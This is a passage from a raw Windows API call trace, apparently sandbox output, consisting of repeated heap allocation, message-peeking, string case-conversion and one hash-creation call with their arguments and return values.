dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.379] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.380] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.380] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0258.380] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.380] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0258.381] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.381] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.381] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.381] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.381] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.381] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.381] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.381] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.382] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.382] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.382] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.382] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.382] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.382] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.382] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.382] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0258.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.382] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0258.383] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.383] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0258.383] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.383] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.384] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.384] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.384] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.384] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.384] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.384] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.384] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.385] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.385] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.385] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.385] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.385] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.385] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.385] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.385] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.386] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.386] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.386] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.386] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.386] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.386] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.386] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.387] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.387] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.387] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.387] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.387] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.387] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.387] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.388] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.388] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0258.388] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.388] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.388] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.388] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.388] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.389] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.389] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.389] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.390] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.390] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.390] RtlAllocateHeap 